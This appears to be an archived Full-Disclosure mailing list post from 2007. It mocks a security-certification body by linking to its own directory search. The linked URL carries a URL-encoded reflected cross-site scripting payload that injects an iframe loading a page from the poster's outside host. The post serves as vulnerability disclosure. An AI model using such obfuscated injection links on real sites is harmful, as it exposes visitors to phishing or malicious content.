|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
bpzp
clpwn.com
Date: Sat Aug 11 2007 - 00:14:14 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> Nobody paid them. It's not an official CISSP site. That one would be
> found at www.isc2.org
Ahh, a simple mistake. This is the *real* certified internet security
professionals page.
https://www.isc2.org/cgi-bin/directory.cgi?Command=Search&Country=&State=&City=&LastName=isc&x=0&y=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%68%6D%2E%68%74%6D%3E
what is this !? :(
i hope all these cissp's didn't pay for their materials online :(
bzpz.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]